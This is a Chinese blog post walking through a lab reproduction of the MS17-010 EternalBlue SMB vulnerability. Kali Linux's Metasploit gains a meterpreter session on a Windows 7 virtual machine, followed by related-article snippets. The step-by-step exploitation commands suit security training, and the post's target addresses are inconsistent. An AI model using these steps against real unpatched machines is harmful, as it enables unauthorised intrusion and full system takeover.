MS17_010（永恒之蓝）漏洞复现

最新推荐文章于 2025-12-22 19:02:22 发布

原创最新推荐文章于 2025-12-22 19:02:22 发布 · 1.3k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#linux #安全漏洞 #windows 7

web 同时被 2 个专栏收录

5 篇文章

订阅专栏

安全漏洞

2 篇文章

订阅专栏

本文详细介绍如何在虚拟机环境中利用Kali Linux攻击Windows 7系统上的永恒之蓝漏洞。步骤包括环境搭建、使用Metasploit框架进行端口扫描、漏洞模块配置及成功控制靶机的过程。

环境准备

本次漏洞复现使用虚拟机环境进行：
攻击机：kali IP地址：192.168.3.128
靶机：windows7 64位 IP地址：192.168.3.141

kali开启msfconsole

使用msfconsole命令，当出现msf6 > 说明成功进入msf命令行。
注：若是第一次开启msf，需要输入命令msfdb init 进行msf数据库初始化。

使用msf自带db_nmap进行端口扫描

使用命令：db_nmap -sT 192.168.3.141
扫描目标主机是否开启445端口，是否具有永恒之蓝漏洞。
注：扫描之前需要先关闭win7的防火墙。
关闭win7防火墙

在这里插入图片描述

使用search命令搜索MS17_010

在msf命令行中使用search命令搜索MS17_010漏洞

使用use命令使用ms17_010_eternalblue模块

在这里插入图片描述

使用show options命令查看模块相关配置

在这里插入图片描述 yes表示需要进行配置。
配置rhosts选项为192.168.1.141（靶机地址）
配置lhost选项为192.168.1.136（攻击机地址）
配置lport选项为4444（使用任意未被使用的端口）

使用run命令运行模块

在这里插入图片描述当命令行出现meterpreter时，就说明成功控制了win7

使用getuid查看目前账户的权限

getuid

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

lhix_

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Ms17-010永恒之蓝漏洞复现

千寻的博客

01-04

1918

Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚， “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，在多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...

永恒之蓝漏洞复现(ms17-010)

热门推荐

渗透之路，攻防之间皆学问

01-20

2万+

Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。

参与评论您还未登录，请先登录后发表或查看评论

Kali-MSF-永恒之蓝漏洞复现（ms17_010_eternalblue）

m0_74313947的博客

09-02

1555

实验环境：windows7首先关闭防火墙目标靶机ip地址为192.168.31.89。

MS17_010永恒之蓝漏洞复现

qq_73722777的博客

12-10

539

使用ms17-010漏洞的一点体会

ms17_010永恒之蓝漏洞复现

Mr_Robotsan的博客

11-28

317

ms17_010永恒之蓝漏洞复现两台虚拟机，确保都在同一网段攻击机:kali linux ip:192.168.15.139 靶机:windows 7 enterprise ip:192.168.15.140 （靶机需要关闭防火墙） 1.打开msf,寻找ms17_010相关的exp，payload search ms17_010 得到信息如下： 2.使用第二个exp对靶机进行攻击这里默认使用了windows/smb/ms17_010_eternalblue payload 设置靶机ip后输入r

Windows 7 ms17-010永恒之蓝漏洞复现

m0_51600840的博客

07-04

2494

复现ms17-010漏洞环境：1.进入框架：msfconsole 2.使用search命令查找相关漏洞： search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址：set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址：set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻

ms17-010永恒之蓝漏洞复现

weixin_45513838的博客

07-22

355

ms17-010永恒之蓝漏洞复现所需环境VMware,两台主机使用NAT模式连接 kali 192.168.79.128 windows7 192.168.79.129 PING命令测试主机间网络联通情况（实验必须在两者都能PING通对方的情况下进行）当发现kali单方ping不通win7,需要先关闭win7防火墙 1.输入命令 msfconsole 进入msf框架 2.命令search ms17-010 寻找ms17-010 相关漏洞利用部分 3.命令use auxiliary

MS010-17永恒之蓝漏洞复现

sucker的博客

10-29

1001

同时，该病毒与普通勒索病毒不同，其不会对电脑中的每个文件都进行加密，而是通过加密硬盘驱动器主文件表(MFT)，使主引导记录(MBR)不可操作，通过占用物理磁盘上的文件名，大小和位置的信息来限制对完整系统的访问，从而让电脑无法启动，相较普通勒索病毒对系统更具破坏性。SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；

MS17_010(永恒之蓝)漏洞复现

qq_29959945的博客

05-12

1822

MS17_010永恒之蓝漏洞复现目录前言 1.准备工作 2.漏洞利用步骤前言 永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。 1.准备工

2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验

2401_84297796的博客

05-03

1824

6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接，所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测，这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary（辅助模块）先进行踩点，查看漏洞是否可以利用，再去进行渗透攻击。3、使用#show options 命令，查看需要设置的选项（Required为yes是必须设置的选项）。

2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)

2401_84297796的博客

05-03

1187

1、msfconsole进入MSF模式，再测试能不能ping通目标主机（192.168.164.129），用nmap扫描主机开放445端口，接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测，这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary（辅助模块）先进行踩点，查看漏洞是否可以利用，再去进行渗透攻击。3、使用#show options 命令，查看需要设置的选项（Required为yes是必须设置的选项）。

Linux SSH配置密钥文件及免密登录

Tongyao

12-18

152

本文介绍了配置SSH免密登录的详细步骤：1）使用ssh-keygen生成RSA密钥对；2）将公钥加入authorized_keys文件；3）在A机器上传B机器私钥至.ssh目录；4）设置密钥权限为600；5）配置~/.ssh/config文件指定主机、用户和密钥路径；6）通过简化命令实现免密登录。整个过程强调了密钥权限设置的重要性，并提供了完整的配置示例。

【Linux】内网穿透（实操）/打洞

2401_83251330的博客

12-20

1626

我这里没有记录"，于是，直接将该报文丢弃了，这就是防火墙策略。现在B可以直接去找A：B到A小区保安处说“我找54321号保安亭的A”，保安查登记簿发现8765号保安亭的B在允许名单里，于是放行。利用一台具有公网IP的服务器作为“桥梁”或“中继站”，通过由内网设备主动发起的、持续的连接，在公网与内网之间建立一条虚拟的数据隧道，从而绕过NAT/防火墙的限制。最后，如何验证你的云服务器上的端口是否是可达的，可以被公网访问的，我们可以在cmd使用telnet，如果没有telnet,可以在powershell执行。

Linux 进程控制

最新发布

2401_87277188的博客

12-22

470

本章重点①：学习进程的创建，fork/vfork②：学习进程终止，认识$③：学习进程等待④：写一个微型的shell（单独列一章），重新认识shell运行原理。

MobaXterm 高效运维实战：从入门到进阶的 Linux 运维 “瑞士军刀” 用法

hy行者勇哥的博客

12-18

877

MobaXterm 作为 Linux 运维的 “全能工具包”，不仅集成了 SSH 终端、SFTP 文件传输、X11 图形转发等基础功能，更隐藏着批量执行、宏命令、会话分组等高级特性，能轻松解决新手常遇到的 “重复操作繁琐”“多服务器切换麻烦”“文件传输低效” 等痛点。本文用 “运维指挥中心” 的通俗比喻，拆解 MobaXterm 的核心架构，针对 Linux 运维中的高频问题，分享可直接上手的高级技巧与自动化脚本案例，帮助新手快速从 “手动跑腿” 升级为 “高效指挥”，大幅提升运维效率。

Linux shell中设置串口参数

luotuo28的博客

12-22

100

本文介绍了在Linux shell中配置串口参数的多种方法。主要使用stty命令设置波特率、数据位、校验位和流控制等基本参数，提供完整配置示例；通过setserial命令配置硬件参数；展示C程序调用ioctl系统调用的实现方式；以及Python中使用pyserial库的配置方法。文章包含详细的命令语法、常用参数设置和完整脚本示例，涵盖了从基本终端配置到编程接口的多种串口设置方案。

Linux串口通信参数设置标志详解

luotuo28的博客

12-22

221

本文详细介绍了Linux串口通信参数设置的核心数据结构termios及其各字段配置方法。主要内容包括：1)控制模式标志(c_cflag)的数据位、停止位、校验位和硬件流控制设置；2)输入模式标志(c_iflag)的软件流控制和输入处理配置；3)输出模式标志(c_oflag)的原始/规范输出模式选择；4)本地模式标志(c_lflag)的规范/非规范模式切换；5)控制字符数组(c_cc)的超时和最小读取字符设置；6)波特率配置方法；7)完整的串口配置示例代码；8)实用函数如tcflush的使用。这些配置参数共同

Linux 实操命令大全

卓越之识论道，平常之识论事，狭隘之识论人

12-18

627

文件和目录的基本操作文件查看和编辑权限管理系统监控网络操作进程管理软件包管理文本处理定时任务掌握这些命令可以大大提高Linux系统操作的效率。建议在实际使用中多练习，熟能生巧。注意使用rm -rf等危险命令前请仔细确认修改系统配置前建议备份使用sudo或root权限时要谨慎定期更新系统和软件包以保持安全。

Mac_Linux 查询网站IP地址：4个核心命令详解

Bruce_xiaowei的博客

12-18

818

命令核心特点适用场景nslookup经典、直观，支持基本DNS记录查询日常简单查IP，想了解DNS服务器信息host输出极简，支持反向解析快速获取IP，不需要多余信息；根据IP查域名curl附带功能，需结合-v/-I参数；核心是HTTP请求测试网页访问时，顺便查看域名解析的IPdig功能最强，支持所有DNS记录；输出详细解析过程专业DNS排查（解析延迟、记录异常等）；查询复杂DNS记录。

永恒之蓝ms17_010漏洞复现实验

01-03

很抱歉，根据提供的引用内容，我无法提供关于永恒之蓝MS17-010漏洞的复现实验。这是因为复现该漏洞需要特定的环境和设备，并且涉及到非法活动。我强烈建议您不要尝试复现该漏洞，以免违法和造成不必要的损失。如果...